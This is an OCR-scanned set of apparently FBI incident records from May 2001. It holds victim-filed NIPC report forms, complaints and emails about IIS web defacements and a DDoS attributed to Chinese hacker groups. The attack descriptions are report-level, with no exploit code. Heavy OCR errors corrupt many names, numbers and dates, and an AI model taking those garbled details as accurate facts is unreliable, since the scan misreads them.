15. 


16. 


17. 


18. 


19. 


20 


21 


22. 


23. 


24. 


.) Commonwealth of Pennsylvania cof qw. 
Commonwealth Technology Center 


(609) 641-7500 ext.[ ] 


Inc. P az ad 


) Open Systems Solutions, 


710 Floral Vale Blvd 


a PA 19067 


) Prince Law Offices c/o 
42 South 5th Street 
Reading, PA 19602 
(610) 375-8425 


— ra: 
— a! 


) Miller's Capital Insurance c/o 
805 North Front Street 


—— PA 17102 
) Deloitte Consulting Group cid 1] "d 


3600 Vartan Way 
Harrisburg, PA 17110 


(717) 651-2858 ext[  ] 


.) APR Supply Company Du w 


305 North 5th Street 


pasa - 17022 


1 Technology Park 


penu PA 


) Na Depot 


Naval Criminal Investigative Service) " 


) Pennsylvania State University c/o[ QU 
Harrisburg Campus 
me fol 


Harrisburg, PA 


) Strafford Mechanical, 
37 Industrial Blvd. 


[ue 


To: j ; Philadelphia © 
Re: 05/18/2001 b3 


b7E 


ee ee — (ca be 


820 Town Center Drive 


pum PA 19047 


Philadelphia FBI considers this matter ongoing and will 
forward any additional and related incidences to Chicago FBI. 


To: Chicago From: Philadelphia 
Re: Lo] 05/18/2001 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
-AT CHICAGO, ILLINOIS 


Read and clear. 


++ 
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PN FD-71 (Rev. 3-27-95) : 
_ Complaint Form & 


A. 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [X] Negative [ ] See below 


Subject's name and aliases Character of case 


UNSUB; COMPUTER CRIMES 
UNIGLOBE/WINGS TRAVEL, 
6198 BUTLER PIKE, 


BLUE BELL, PA. - VICTIM Complainant | ie 


UNIGLOBE/WINGS TRAVEL 


Complaint received 


[] Personal [] Telephonic Date 05/09/2001 Time 1:00 pm. 


Address of Subject Complainant's address and telephone number 


Pike, Blue Bell, Pa. 


Complainant's DOB 


Subject’s 
Description 


Scars, marks and other data 


Employer Address Telephone 


Vehicle Description 


Facts of Complaint 


ENTE Uniglobe/Wings Travel, Blu r 
| Pamm telephonically advised that on 05/07 , at approximately 8:30 


a.m., his company discovered their web page on the Internet had been 
"hacked" with anti-government slogans. jc eu Ce this intrusion 
was discovered when he automatically accessed his home page on 
05/07/2001. gave the following answers to specific questions 
concerning this intrusion: 


Was connection logging active? Yes 


Do not write in this space. 


t received by) . BLOCK STAMP 


Can you provide copies of all logs dating 48 hours 
before the intrusion was detected? Probably 


What is the network topography? Unknown 


Where does the accessed equipment reside? 
Blue Bell, Pa. 


Who has access to the equipment? 


Remotely? All employees (18) in the office can 
access their Intranet site from home. 
Physically? All employees (18) 


What type of system was intruded upon? 
Operating System Windows 2000 
Hardware Dell and various others 


What is the password scheme (alphanumeric)? 
Downloaded from Internet "Authextix" 


How much loss was incurred? 

Damage amount None 

Cost for repairs Unknown 

Outside services Unknown 

Man hours multiplied by salary Unknown — 
Are any of the ports bannered? Unknown 


Was any email threatening or reporting the intrusion 
received? No 


Are copies available? Has copy of executed script 


Who is your upstream and downstream Internet provider? 
Rhythms is their DSL 


Were any programs installed on the intruder system? 
Unknown 


Are copies of the programs available? Unknown 


Was the intruded computer's hard drive removed and 
stored for examination? No 


L informed this incident would be made a b6 
matter of record. b7C 


TATUS WU 


Re: Web befacem 


From: * NIPC-WATCH 

To: 

Date: 5/12/01 2:39AM 
Subject: Re: Web Defacement 
Hello, 


Sorry for the mix up, you should have received this web site defacement. 
Thanks 


Subject: Cyber Incident Report Form 


Date: Eri, 11 May 2001 10:50:43 -0400 
From: b6 
To: «nipc.watc I.gov» b7C 


Report date time-5/11/01 

Name 

Title 

Telep 

Email 

Organization-Solution Systems Inc. 

Addrs_Street=114 Forrest Ave 

CityzNarberth 

State=PA 

Zip Code=19072 

Country=usa 

Question1_ Organization=SAME 
Question1_Coniact_!Info=SAME 
Question1 Tele NumberzSAME 

Question1, StreetZSAME 
Questioní, City State Zipcdz-SAME . 
Question1_Country=SAME 

Question1, Email-SAME 

Question2 Location Computer network located at the above address, in 
locked / protected computer room. 
Question3 Date Time-5/5/01 - 5/7/01 
Question4_Critical=Yes 

Question5_crit_infrasture=Not Applicable 
Question5_Remarks=No Remarks 
Question6_nature_of_prob=Web site defacement 
Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 

Question8 method of attack-Vulnerability exploited 
Question8 Remarks-Windows 2k / IIS 5.0 vulnerabilites were exploited. 
Specifically with regard to Microsoft Security Article MS01-023 
Question9 sus perpetrators-Unknown 
Question9_Remarks=No Remarks 

Question10 ip addrs-210.111.114.15 and 208.247.158.103 
Question11_evid_of_spoof=Unknown 
Questioni2_oper_systems=NT 
Question12_oper_systems=Windows 
Question12_Remarks=No Remarks 

Question13 security infrasture-Firewall 
Questioni4 attack loss infozUnknown 


Question14 Remarks-No Remarks 

Question15 damage. systmszYes 

Question15 Remarks-The intrustion replaced the default.htm / default.asp 
pages on numerous websites 

Question16 what, actions-System(s) disconnected from the network 
Question16 what, actions-Other ` 
Question16 what, actions-Log files examined 

Questiont6 Remarks-Applied all recommended Microsoft security patches 
Question17 Field Office= 

Question17_fieldoff_inform=No 

Question18_agency_inform=No 

Question18 State local Police= 

Question18 Inspector General- 

Question18 CERT-CC- 

Question18 FedCIRC- 

Question18 JTF-CND- 

Question18 Other- 

Question19 date of last, update-5/4/01 

Question19 org work update-self 

Question20_POC Information= 

Question20_sys_adm_contract=No 

Share Info With=Infrastructure Orgs 

Question21_remarks=On or about 5/5/01, an unknown user maliciously 
changed the default pages on at least 3 websites. These new pages 
contained defamatory comments agains the US government. 


|o» 5/11 4:50 PM >>> 
this victim is located in Michigan, not PH. 


>>> NIPC-WATCH 05/11/01 12:00PM >>> 
Subject: Cyber Incident Report Form 


Date: Eri :04:59 +0000 (GMT) 
From <webmaster@triton.net> 
To: <nipc.watch@fbi.aov> 

Repo 001 - 10:50 AM 

Name 


Telephone Fax Numbe 
Email=webmaster@triton.net 

Organization=Triton Technologies Inc. 

Addrs_Street=4009 Plainfield Ave. NE 

City=Grand Rapids 

State=Michigan 

Zip Code=49525 

Country=USA 

Question1_Organization=SAME 

Question1_Contact_Info 

Questioní, Tele Numbe 

Question1_Street=SAME 

Question1_City_State_Zipcd=SAME 

Question1_Country=SAME 

Question1 Email-SAME 

Question2_Location=Back room where all the servers are located. 
Question3, Date Time-5/8/2001 - 5:14 AM 
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Question4 CriticalzNo 

Questionb crit, infrasture-Not Applicable 

Question5 Remarks-No Remarks 

Question6 nature of prob-Web site defacement 

Question6 otherz 

Question?, exp problem-No 

Question7_Remarks=To view what was done go to http://webmaster.triton.net/hacked/ 
Question8 method of attack-Vulnerability exploited 

Question8 Remarks-Microsoft Windows 2000 IIS 5.0 exploite. Info located (à 
http://www.eeye.com/html/Research/Advisories/AD20010501.html 
Question9 sus perpetrators-Other 

Questiong Remarks-The Chinese and American computer hacking wars. 
Question10 ip addrs-Unknown. IIS crashed so it logged nothing. 
Question11_evid_of_spoof=Unknown 

Question12 oper systems-Windows 

Question12 Remarks-Windows 2000 Pro 

Questioni4 attack loss info-No 

Question14_Remarks=No Remarks 

Question15 damage systms-Yes 


Question15 Remarks-Files were overwritten with the ones the person uploaded defacing the web sites. 


Question16 what, actions-Backup of affected system(s) 
Question16 what actions-Other 
Question16 what actions-Log files examined 


Question16 RemarkszPatched IIS 5.0 with a fix that Microsoft has released. Also installed a firewall to 


log anything that might happen again. 
Question17 Field Office= 

Question1 7_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local Police= 
Question18_Inspector General= 
Question18_CERT-CC= 

Question18 FedCIRC- 
Question18_JTF-CND= 

Question18, Other- 
Questioni9 date of last update-5/11/2001 - Present Time 
Question19 org work update- 
Question20. POC Information= 
Question20 sys adm, contract-No 
Share Info With=Public 


Question21_remarks=I have no evidence who did the hacking. No logged IP addresses of any kind. ! do 
have everything back up and working now. | just felt | should report this so it could be on some sort of 


record. 
Also the computer is located at a state wide ISP in Michigan. 


From: NIPC-WATCH 


To: 

Date: 5/8/01 7:11PM 

Subject: China Intrusion 

Watch received the following incident report foL |] Palisades School District, 39 Thomas b6 
Free Drive, Kintnersville, PA 18930 which was forwarded to: SSA CIU and SSA b7C 


C Philadelphia Field Office. Serial number: 050801-011-41540. 


NIPC Watch 


Subject: Cyber Incident Report Form 

Date: 51:45 - 

From b6 
To: “nipc.watch@fbi.gov™ <nipc.watch@fbi.gov> b7c 


Report. date. time-May 8, 2001 

Nam 

Title 

Telephone Fax Numberz610-847-5131 ext! — ] 

Email 

Organization=Palisades School District 

Addrs_Street=39 Thomas Free Drive 

City=Kintnersville 

State=Pennsylvania 

Zip Code=18930 

Country=US 
_Question1_Organization=SAME 

Question1_Contact_Info= 

Question1_Tele_Number= 

Question1 StreetZSAME 

Question1, City State Zipcd- 

Question1_Country= 

Question1_Email= 

Question2_Location=Durham Nockamixon Elementary School at the address listed 
above in the District Office. 

Question3_Date_Time=May 5, 2001 at 11:00 am 

Question4 Critical» No 

Question5 crit infrasturezNot Applicable 

Question5. Remarks-No Remarks 
Question6 nature of probzintrusion 
Question6 nature of prob-System impairment/denial resources 
Question6 nature of prob-Compromise of system integrity 
Question6 nature of prob-Damage 

Question6_other= f 

Question7. exp problem-No 

Question7_Remarks=No Remarks 

Question8 method of attack-Vulnerability exploited 

Question8 Remarks-The perpetrator used a security flaw in Microsoft's 
Internet Information Server to delete executable files from DNS/e-mail 
server harddrives. 

Question9 sus perpetrators-Other 


Question9_Remarks=Chinese hacker, as was indicated by a message left by the 
perpetrator. 

Question10, ip addrs-62.226.240.247 - £?€ Fe 

Question11 evid of spoof-Unknown 

Question12 oper systems-NT 

Questioni2_Remarks=No Remarks 
Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question13_security_infrasture=Security Auditng Tools 

Question13 security infrasture-Packet filtering 

Question14 attack loss infozNo 

Questioni4_Remarks=No Remarks 

Question15_damage_systms=Yes 

Question15 Remarks-Enough executables were deleted from the systems to 
require a total re-installation, and restore from backup. I've left one of 

the two systems as is, just in case someone wants to check it out. 
Question16 what actions-Other 

Question16 what, actions-Log files examined 

Question16 Remarks-One of the systems has been totally re-installed, and 
security patches have been applied to all systems accessing the internet. 
Question17. Field Office= 

Question1 7_fieldoff_inform=No 

Question18_agency_inform=No 

Question18_State_local Police= 

Question18 Inspector General= 

Question18_CERT-CC= 

Question18_FedCiIRC= 

Question18_JTF-CND= 

Question18_Other= 

Question19 date of last update-May 3, 2001 
Questioní9 org work update-Same as POC info above. 
Question20 POC Information 

Question20, sys adm, contract-No 

Share Info Withz Public 

Share Info With=Infrastructure Orgs 

Question21_remarks=No additional remarks 
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To: 
Date: 5/4/01 8:26AM 
Subject: Incident report #050301 008 41241 


egarding a possible web 
andling Chinese e-mails 
FBI/NIPC Philadelphia, and CC a 


The watch received the following e-mail via, nipc.watch acct. from a 
j orwarded information to 
one copy was sent to S 
copy to 


—————M 
Incident Report #05! 


Subject: Cyber Incident Report Form 

Date: Thu, 3 May 2001 14:09:52 -0400 

From; 

To: “nipc.watch@fbi. gov" <nipc.watch@fbi.gov> 


Report_date_time=05/03/2001 - 13:52 


Organization=Moravian College 

Addrs Street-120 W. Greenwich St / CIT 

City-Bethlehem 

State=PA 

Zip Code=18018 

Country=USA 

Question1_Organization=SAME 

Question1_Contact_Info= 

Questionl Tele Number- 

Questionl Street-SAME 

Questionl City State Zipcd- 

Questionl Country- 

Questionl Email- 

Question2_Location=Moravian College 

Comenius Hall / Room C-4 

1200 Main Street 

Bethlehem, PA 18018 

Question3 Date Time-05/02/2001 - 5:04PM - 5:30PM 
Question4_Critical=No 

QuestionS_crit_infrasture=Other 

Question5 Remarks-Educational 

Question6 nature of prob-Web site defacement 

Question6 other- 

Question7 exp problem-No 

Question7 Remarks-No Remarks 

Question8 method of attack- Vulnerability exploited 

Question8 Remarks-Vulnerability in IIS exploited. Attacker accessed a 
directory (/scripts) and was able to get a command prompt. Copied html 
pages to server with anti-US government statements signed with a Chinese 
e-mail address. That *appears* to be the extent of the 'damage". 
Question9 sus perpetrators-Other 

Question9 Remarks-Apparent source IP address is in Japan. Attacker unkown. 
Motive - anti-US statements due to tensions between China and the US. 
QuestionlO ip addrs-210.230.128.198 

Questionll evid of spoof-No 
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Question12 oper systems-NT 

Question12 Remarks-Windows NT, SP5, HS, Outlook Web Access. 
Question13 security infrasture- Firewall 
Questionl4 attack loss info-Unknown 

Question!4_Remarks=No Remarks 

Question15 damage systms-Yes 

Question15 Remarks-We are going to rebuild the computer. The html files 
were damaged, we aren't sure of the extent of the intrusion to the system or 
our network (even though it appears to be limited to just changing html 
files). 


To: 
Date: 5/6/01 5:06PM 
Subject: Incident Report 050601 002 41371 


Subject: Cyber Incident Report Form 

Date: Sun, 6 May 2001 14:49:52 -0400 

From 

To: “nipc.watch@fbi.gov™ <nipc.watch@fbi.gov> 


Report_daie_time=May 6, 2001 2:40 PM 


Organization=MAC DIRECT 

Addrs_Street=185 Discovery Dr. 

City=Colmar 

State=PA 

Zip Code=18915 

Country=USA 

Question1_Organization=SAME 

Question1_Contact_Info= 

Question1 Tele Number- 

Question, Street-SAME 

Question, City State Zipod- 

Question1 Country- 

Question1, Email- 

Question2 Location-Computer room located at 185 Discovery Dr. 
Question3 Date TimezlIncident 1: 12:15 PM 5/5/2001 Incident 2: 3:0 
Question4 CriticalzYes 

Question& crit, infrasturez Other 

"Question5 crit infrasturez Telecommunications 
Question5_Remarks=Merck-Medco Formululary Web Site 
Question6 nature of prob-Intrusion 
Question6 nature óf prob-System impairment/denial resources 
QuestionG nature of prob-Unauthorized root access 
Question6 nature of prob-Web site defacement 

Question6 nature of prob-Compromise of system integrity 
Question6 other- 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_method_of_attack=Distributed Denial of Service 
Question8 Remarks-MS Hotfix that was applied but not active. 
Question9 sus perpetrators-Other . 
Question9_Remarks=PoizonBox 

Question10_ip addrs-Multiple sources 
Question11_evid_of_spoof=No 

Question12_oper_systems=NT 

Question12 Remarks-Check email. 

Question13 security infrasturezIncident/Emergency Response Team 
Question13 security infrasture-Encryption 

Question13 security infrasture-Firewall 
Question13, security infrastureeSecure Remote Access/Authorization tools 
Question13, security infrasturezsSecurity Auditng Tools 
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Question13 security infrasturezAccess Control Lists 
Question13 security infrasturezPacket filtering 
Question14 attack loss info-No 
Question14 Remarks-No Remarks 
Question15 damage systms-No 
Question15_Remarks=No Remarks 
Question16 what actions-System Binaries checked 
Question16 what actions-Backup of affected system(s) 
Question16 what actions-Other 
Question16 what, actions-Log files examined 
Questioni6_Remarks=Worked with ISP (VoiceNet) to mitigate DDOS 
Question17. Field Office- 
. Question17_fieldoff_inform=No 
Question18 agency, inform-No 
Question18 State local Police- 
Question18, Inspector General= 
Question18 CERT-CC- 
Question18 FedCIRC- 
Question18 JTF-CND- 
Question18_Other= 
Question19_date_of_last_update=5/1/2001 
Question19_org_work_update=My staff. 
Question20_POC Information= 
Question20_sys_adm_contract=No 
Share Info With=Infrastructure Orgs 
Question21_remarks=Please check email to follow. 
Subject: Cyber Incident Report Form 
Date: Sun, 6 May 2001 14:42:31 -0400 
From: b6 
To: “nipc.watch@fbi.gov™ <nipc.watch@fbi.gov> i ; b7C 


Report date timezMay 6, 2001 2:40 PM 


OrganizationzMAC DIRECT 

Addrs_Street=185 Discovery Dr. 

City=Colmar 

State=PA 

Zip Code=18915 

CountryzUSA 

Question1, Organization-SAME 

Question1 Contact Info- 

Question, Tele Number- 

Question1_Street=SAME 

Question1_City_State_Zipcd= 

Question1_Country= 

Question1_Email= 

Question2 Location-Computer room located at 185 Discovery Dr. 
Question3 Date Time-Incident 1: 12:15 PM 5/5/2001 Incident 2: 3:0 
Question4 CriticalzYes 

Question5_crit_infrasture=Other 
Question5_crit_infrasture=Telecommunications 
Question5_Remarks=Merck-Medco Formululary Web Site 
Question6_nature_of_prob=Inirusion 


Question6 nature of prob-System impairment/denial resources 
Question6 nature of prob-Unauthorized root access 
Question6 nature of prob-VVeb site defacement 
Question&, nature of prob-Compromise of system integrity 
Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_method_of_attack=Distributed Denial of Service 

Question8 Remarks-MS Hotfix that was applied but not active. 
Question9 sus perpetratorszOther 

Questiong Remarks-PoizonBox 

Question10_ip_addrs=Multiple sources 

Question11 evid of spoof-No 

Question12, oper. systems-NT 

Question12 RemarkszWindows NT 4.0 sp6.0a, IIS 4.0, all post service pack 
hotfixes applied. Hotfix that appears to have failed is described at: 
hitp:/Avww. microsoft.com/technet/security/bulletin/fq00-086.asp 
Question13_security_infrasture=Incident/Emergency Response Team 
Question13_security_infrasture=Encryption 

Question13, security infrasture-Firewall 
Question13, security infrasture-Secure Remote Access/Authorization tools 
Question13 security infrasture- Security Auditng Tools 

Question13 security infrasture-Access Control Lists 

Question13, security infrasture-Packet filtering 

Question14. attack loss info-No 

Question14_Remarks=No Remarks 

Question15 damage systms-No 

Question15_Remarks=No Remarks 

Question16, what actíons-System Binaries checked 
Question16. what actions-Backup of affected system(s) 
Question16 what, actions-Other 

Question16 what, actions-Log files examined 
Questioni6_Remarks=Worked with ISP (VoiceNet) to mitigate DDOS 
Question17. Field Office- 

Question17_fieldoff_inform=No 

Question18_agency_inform=No 

Question18_State_local Police= 

Question18 Inspector General= 

Question18. CERT-CC- 

Question18, FedCIRC- 

Question18_ JTF-CND- 

Question18, Other- 

Question19 date of last update-5/1/2001 

Questioní9 org work update-My staff. 

Question20_POC Information 

Question20. sys adm, contract-No 

Share Info With-Infrastructure Orgs 

Question21_remarks=1. At around 12:15PM, intruders exploited a vunerability 
in IIS 4.0 on the MMMC machine. This was detected by our remote content 
monitoring, and by an NT auditing alert. They placed 4 common start pages 
index.asp, index.htm, default.asp, and default.htm in the web directory for 
MMMC. They also attempted, but were foiled from attempting this on other 
machines. Later analysis showed that MS hotfix described at 

http://www. microsoft.com/technet/security/bulletin/fq00-086.asp while 
applied shortly after issue was not active. We will be researching how this 
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occured and why our routine testing did not detect it. 

2. At approximately 12:45 the files were removed from the web server by the 
on-call engineer. By 1:10PM the correct file was restored and operations 
resumed. An incident report will be the NIPC (FBI) and we completed a 
archive of all logs, files, audit events, system state, and hacked files 

(the four placed in the directory). 


3. At approximately 6:00 we detected a dDos attack on another web server and 
our primary and secondary DNS server. Working with our ISP we quickly broke 
the DNS hack (malformed packets which loaded the server). We also blocked 
access to the 4 primary sources of the port 80 attack: China Internet 

Company, an ISP in Sweden, the University of Utah, and Verisign (we are 

still uncertain on this one). We have good data on all of these and theyt 
Question1_Email= 

Quest 

will be forwarded to the NIPC. 


4. Throughout the day we saw a much larger than normal amount of address 
space probes, but the perpetrators appear to be very good at staying "under 
the radar." We are paying special attention to 66.37.210.105, which appears 
to be the ip address used to hack the system (based in IIS logs). 


We are continuing to aggregate data for this incident. Our staff performed 
as we have in mock attacks and | believe we have captured as much info as 
possible. We continue to monitor and assess security and have staff on-site 
today working on the hotfix issue. 


| will continue to issue status reports as we gain new information. 


Subject: Incident Report 


Date: 15:54 - 
From b6 
To: “nipc.watch@fbi.gov" <nipc.watch@fbi.gov> b7C 


| was unable to use the web form so | will duplicate the fields and 
responses below: 


Report Date/Time: May 6, 2001 2:40 PM 


Contact: 


MAC DIRECT 
185 Discovery Dr. 
Colmar, PA 18915 


My Cell phone 
My home number 
Company numbe 


Incident Information: 


Attack occurred at above facility (a server housed at 185 Discovery Dr., 
Colmar, PA) 


Date and time of incident: 

Incident 1 (Website defacement) : 12:11 PM, 5/5/2001 

Incident 2 (DDos on port 80 and DNS primary and secondary): approx. 6:00 PM 
5/5/2001 


Incident 1 was detected and fixed by 12:45PM 
Incident 2 was detected and fixed by 9:00 PM 


This is a critical system/network for our client, Merck Medco 
Critical infrastructure sector: Telecommunications and healthcare 
Nature of problem: 

Intrustion 

Unauthorized root access 

Compromise of system integrity 

Has this been a problem before: 

No 

Suspect method of intrusion/attack: 

DDos and Vunerability (NT IIS 4.0 SP6.0a post service-pack hotfix applied 
but not functional. 

(http://www. microsoft.com/technet/security/bulletin/fq00-086.asp _ 
Suspected perpetrator: PoizonBox (see attached file). 

Apparent source of attack: 

Multiple sources. 

Evidence of spoofing: 

No 

OS: 

Windows NT 4.0 sp6.0a 

Security infrastructure in place: 

Incident Response Team 

Firewall 

Security Auditing Tools 

Packet filtering 

Encryption (not applicable here as is a "public" site) 


Secure Remote Access 
Access Control Lists 


XP 


| Incident Report 04 


Did the intrusion/attack result in a loss/compromise of sensitive, classifed , 
or proprietary information? 


No 

Did the intrusion/attack result in damage to system(s) or data? 
No 

What actions and technical mitigation have been taken? 


Backup of affected systems 

Log files examined (Firewall, IS) 

System Binaries checked (performed scan for changed and updated files and 
registry analysis) 

Worked with ISP (VoiceNet) to mitigate DDos 


Has the FBI local office been informed: 

No 

Has another agency/organization been informed? 
No 

When was the last system update? 

5/1/2001 by my staff. 


Is the system admin. a contractor? 


ee 


No 


You may only share this information with InfraGard Members with Secure 
Access 


Here is a status email sent to my customer: 


All problems have been addressed and corrected. However we continue to 
assess: 


Here is a chronology of events: 


1. At around 12:15PM 5/5/2001, intruders exploited a vunerability in [IS 4.0 
on the MMMC machine. This was detected by our remote content monitoring, and 
by an NT auditing alert. They placed 4 common start pages index.asp, 
index.htm, default.asp, and defauit.htm in the web directory for MMMC. They 
also attempted, but were foiled from attempting this on other machines. 
Later analysis showed that MS hotfix described at 
http://www.microsoft.com/technet/security/bulletin/fq00-086.asp while 

applied shortly after issue was not active. VVe will be researching how this 
occured and why our routine testing did not detect it. An open incident with 
Microsoft has them reviewing our registry configuration. 

2. At approximately 12:45 the files were removed from the web server by the 
on-call engineer. By 1:10PM the correct file was restored and operations 
resumed. An incident report will be made 


to the NIPC (FBI) and we completed a archive of ali logs, files, audit 
events, system state, and hacked files (the four placed in the directory). 


3. At approximately 6:00 we detected a dDos attack on another web server and 
our primary and secondary DNS server. Working with our ISP we quickly broke 
the DNS hack (malformed packets which loaded the server). We also blocked 
access to the 4 primary sources of the port 80 attack: China Internet 

Company, an ISP in Sweden, the University of Utah, and Verisign (we are 

still uncertain on this one). We have good data on all of these and they 

will be forwarded to the NIPC. 


4. Throughout the day we saw a much larger than normal amount of address 
space probes, but the perpetrators appear to be very good at staying “under 
the radar." We are paying special attention to 66.37.210.105, which appears 
to be the ip address used to hack the system (based in IIS logs). 


We are continuing to aggregate data for this incident. Our staff performed 
as we have in mock attacks and | believe we have captured as much info as 
possible. VVe continue to monitor and assess security and have staff on-site 
today working on the hotfix issue. 


| will continue to issue status reports as we gain new information. 


We have log files, etc., we can share with you. 


| am not an Infragard member (although have the application on my desk), | 
would like to send any log files etc., as encrypted docs. Please let me know 
if you would like them and how I should encrypt them. 


b7C 
<<jndex.him>> 


Name: index.htm 
index.htm Type: Hypertext Markup Language (text/html) 
Encoding: quoted-printable 
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Philadelphia received multiple telephonic complaints related to the “Honkers qu 
Union of China” website defacements. Special T EEEM of the 
Philadelphia Division addressed that following complaints and obtained the following 


information: 


1. On 05/07/2001, Security, Neutronics, Inc., telephone number b6 
[ ^ ]e-mail address: advised that on bic 


05/07/2001, 2:54 am EST the www.refrigerantid.com website was infiltrated at 


irtual Farm, 
i as the 
hat the Refrigerant ID site 


was the only domain touched on the entire Virtual Farm server and no other 
damage was identified. The intrusion was initiated from an undetectable IP 
address originating in China. The hacker did not have the ability to change or 
delete existing data, but did add a new .asp page which was coded to default as a 
home page. The .asp page contained the following message: “fuck USA 
Government, fuck PoizonBOx.” 


2. On 05/08/200 [Toplink, Inc., 103 East b6 
Pennsylvania Blvd, Festerville, PA 19053, telephone numbe] | ] Bye 
reported that at 9:00 a.m.. this morning he discovered that 12 of their 18 websites 
were defaced from the same server by an unidentified intruder. The message 
was something like “fuck the U.S.” Toplink was unable to identify a source IP 
address for this attack. Toplink runs a Windows NT 4.0 server with no Intrusion 
Detection System (IDS) used. 


3. Onosog2od| ss  ERW Graphics, mc., 9100 b6 
Pennsauken Highway, Pennsauken, NJ 08110, telephone numbal — —  ] b7C 
e-mail des ee advised that their firewall captured an 
unknown intruder attempting to run an exploit through port 80, using a script at 
the URL command prompt. The attack was directed at their Windows NT 4.0 
server at 12:15 EST this afternoon. identified the source IP address of the 
attacker as follows: 202.103.209.37 | as also able to capture a root.exe file 
that was attempted to be executed by the attacker. 


4. On os/os/2001, . ]bitworth Paxson, LLP, 1735 Market b6 
Street, Philadelphia, PA, telephone numbe[ |] advised that their l be 
network was experiencing attempted intrusions from a IP address originating in 


China. directed the interviewing agent e d 
telephone numbe for technical detail related to this intrusion. 


[xe that the attack compromised their Sun Solaris server and 
egan conducting searches for .gov and .us IP address domain names. Yesterday 
semom[ pie that the rpclog command had been changed over 
the weekend. as forced to reboot the system 11:00 a.m. the 


following Monday morning. This attack appeared to be the ISS Worm identified 
in the CERT alert earlier that morning. 


. On (——— a pi€ General 
Hospital, telephone number| advised t ir firewall captured an 
attempted intrusion from IP address 210.77.161.131 ce that this 

intrusion was unsuccessful and the IP address may resolved back to the University 


of China. escribed their system as a Windows NT network with a Check 
Point Firewall. 


. On 05/10/2001 hiladelphia University, 

telephone number advised that their Sun Solaris server was 
compromised by the sadmind/IIS Worm. [was unable to capture any useful 
logs or files related to this worm. 


b6 


b7C 


b6 
b7C 


b6 
b7C 


From: - 


To: 
Date: 5/15/01 6:37PM 
Subject: China Intrusion 


Subject: Cyber Incident Report Form 


Date: : = 
From: $i 
To: “nipc.watch@fbi.gov" <nipc.watch@fbi.gov> m 


Report date time-15 MAY 01/1620 EDT 


Organizationz Ciber 

Addrs, Street-650 Wilson Lane 

City=Mechanicsburg 

State=PA 

Zip Code=17055 

Country=USA 

Question1 OrganizationzSAME 

Question, Contact Info- 

Questiont_Tele_Number] ] 

Questioní Street-SAME 

Question1 City State Zipcd- 

Question1 CountryzUSA 

Questioni_Email=HBGHelpdesk@ciber.com 

Question2_Location=650 Wilson Lane 

Mechanicsburg PA, 17055 

2nd floor, Server Room 
- 1st floor, Server Room 

and 

600 Wilson Lane 

Mechanicsburg PA, 17055 

2nd floor, Server Room 

Question3 Date Timez03 MAY 01 - 0130EDT 

Question4_Critical=No 

Question5 RemarkszNo Remarks : 

Questione nature of prob-intrusion 

Question8 nature of prob-Web site defacement 

Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=On May 3rd, 3 of our servers were penetrated by the HTTP 
service. The first server, SQL-IIS, was hit shortly after 0130. There were 
about 30 entries of HTTP service in the Firewall-1 Log file in a 30 second 
span. The next server, NODE1147, was hit right after that. That 
penetration lasted 23 seconds and there were about 100 entries in the log. 
The last server, PServer15, was hit right after that. There were about 90 
entries in the log in 16 seconds. 


Each of these servers had a dump of default.htm, default.asp, index.htm & 
index.asp files put in numerous directories. All of the pages that were 
looked at said, "fuck USA Government, fuck PoizonBOx, 


contact:sysadmcn@yahoo.com.cn". A file called root.exe was found on each 

PC. 

Question9_sus_perpetrators=Unknown 

Question9_Remarks=No Remarks 
Question10_ip_addrs=WS141113.geography.siu.edu 

Question11 evid of spoof-Unknown 

Question12, oper systems-NT 

Question12 Remarks-Windows NT Server 4 & lIS4 

Question13, security infrasture-Firewall 

Question13, security infrasture-Secure Remote Access/Authorization tools 
Question14 attack loss infozNo 

Question14 Remarks-None 

Question15 damage systms-Yes 

Question15 Remarks-The PServer15 server lost some newly generated web pages 
that had to be redeveloped by that project team. 
Question16. what actions-System(s) disconnected from the network 

Question16 what actions-Other 

Question16 what actions-Log files examined 

Questioni6_Remarks=Node1147 was no longer in production and was taken down. 
PServer15 was patched and Internet access removed. A stand alone FTP server 
was created for the project team. Internet access to the SQL-IIS box was 
tightened. That server is scheduled to be rebuilt on 17 MAY 01. 

Question17. Field Office- 

Question1 7_fieldoff_inform=No 

Question18 agenoy inform-Yes 

Question18, State local Police=Upper Allen Township Police - 7177952445 
Question18 Inspector General- 

Question18 CERT-CC- 

Question18 FedCIRC- 

Questioní8 JTF-CND- 

Question18, Other-An incident report was filed with CERT 

Question19 date, of last update-Varies i 

Question19 org work update- 

Question20 POC Information 

Question20 sys adm  contractzNo 

Question21, remarks-A scan of HTTP accessible systems occurred around 2230 on 
May 2nd. The scan was by IP address and took 3 seconds to scan our 16 
servers. ONLY the HTTP service was used. The scan came from 
"WS141113.geography.siu.edu". 
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Squad 9 

From: [ — ë ] b6 
To: Squad 9 <sq9.ph@fbi.gov> b7C 
Sent: Wednesday, May 16, 2001 11:55 PM i 


Subject: Re: Chinese Hackers 


PointAll Corporation 

950 Tilton Road 

Suite 103 

Northfield, NJ 08225 

P. 609-641-7500 ex[  ] 


thanks 


C ] 


woes Original Message ----- 


From: Squad 9 
Sent: Wednesday, May 16, 2001 3:42 PM b7c 


Subject: Chinese Hackers 


We are collecting information on the victims of the Chinese Hacker web defacements. Please send us your 
full name, business name, business address, and contact day phone number so we can forward it to our HQ 
handling the matter. 


Thank you. 


FBI Philadelphia --Squad 9 

NIPC Computer intrusion Program 

(215) 418-4000 

National: http://www.nipc.gov 

Local PH Chapter: http://infragard.hmconsulting.net/index.himl 


The information transmitted is intended only for the person or entity 
to which it is addressed and may contain confidential and/or 
privileged material. Any review, retransmission, dissemination, or 

| other use of, or taking of any action in reliance upon, this information 
by persons or entities other than the intended recipient is prohibited. 
If you received this in error, please contact the sender and delete 
the material from any computer. 


5/17/01 


To: 
Date: 5/16/01 4:26PM 
Subject: POISONBOX VICTIM 


= ARR cam Inc. STE 
710 Floral Vale Boulevar 

Yardley, PA 19067 

(215) 579-8111 


S 

FBI Philadelphia - Squad 9 

NIPC Computer Intrusion Program 

(215) 418-4292 

